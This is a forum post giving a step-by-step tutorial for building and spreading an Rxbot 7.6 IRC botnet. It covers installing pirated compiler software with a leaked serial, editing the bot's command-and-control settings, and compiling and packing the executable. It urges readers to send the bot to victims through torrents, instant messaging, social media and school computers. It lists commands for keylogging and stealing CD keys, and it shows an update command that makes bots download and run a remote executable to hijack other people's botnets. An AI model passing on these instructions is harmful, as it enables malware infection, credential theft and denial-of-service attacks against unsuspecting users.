If you would like to setup a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he know that the IRC server is not doing anything illegal. If an Admin refuses, don't get angry. It is his/her server after all
Download
Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.
Q:What is a botnet?
A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".
Depending on the source you used, the bot can do several things.
I myself have helped write one of the most advanced and secure bot sources out there.
(Off topic)
But once again depending on the source you can :
Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".
Once again depending on the bot it may be able to kill other fellow competeter bots.
Or even kill AV/FW apon startup.
Add itself to registry.
Open sites.
Open commands.
Cmd,
notepad,
html,
Anything is possible !
Theres the infected computers "bots" the attacker, the server, and the victim.
Quote:
while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.
Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."
Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."
Botnets are being used for Google Adword click fraud, according to security watchers.
Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server. I will setup bots for people if they have something to offer.
---------------
Ignore anything about using the server editor but this tutorial show how to make an irc channel and spread bots:
Download tutorial
-----------------------------
Here we go ladies and gentlemen
Follow the tutorial:
-----------------------------
I. Setting up the C++ compilier: (easy)
1. Download Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)
Mirror 2
Mirror 3 Direct
Pass: itzforblitz
Serial: 812-2224558
2. Run setup.exe and install. Remember to input serial
3. Download and install the Service Pack 6 (60.8 mb)
4. After that Download and install:
Windows SDK (1.2 mb)
Mirror 2
Mirror 3
Pass: itzforblitz
-------------------------------------
II. Configuring the C++ compilier (easy)
1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)
Quote:
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB
4. Now put them in this order: (use up and down arrows)
(it does not matter whats below those lines)
---------------------------------------
III. Configuring your bot: (easy)
1. Download and unpack:
Rxbot 7.6 (212.3 kb)
Mirror 2
Mirror 3
2. You should see an Rxbot 7.6 folder
3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:
Quote:
Put in quotations:
char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password
Optional:
char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass
char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password
Optional:
char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass
-----------------------------------
IV. Building your bot: (very easy)
1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right Click "rBot Files" and click Build:
5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!
YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !
-------------------------------------
Command list
Download Command list
Basics:
.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more
-----------------------------------
Download mIRC
mIRC
Mirror 2
Mirror 3
--------------------------------------------------------------------------------------------
How to secure your bots:
Don't be an ~censored~, it is easy to steal bots. All you need is the irc server address and maybe a key.
To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)
and update the channel topic and run:
Quote:
@update http://www.mybot.com/download/SMSPRO.exe 82
The http://mybot.com is your bot's download link and the 82 can be any number(s)
Now steal their bots and have them join your channel
To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.
To secure your self:
It is fairly easy to secure your bots, here is how:
1. When you are in your right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:
This way no one besides you or another op can set the channel topic
Note: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.
------------------------------------------------------------------------
Good IRC Servers:
I would recommend running your botnet on a private server.
If you would like to setup a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he know that the IRC server is not doing anything illegal. If an Admin refuses, don't get angry. It is his/her server after all
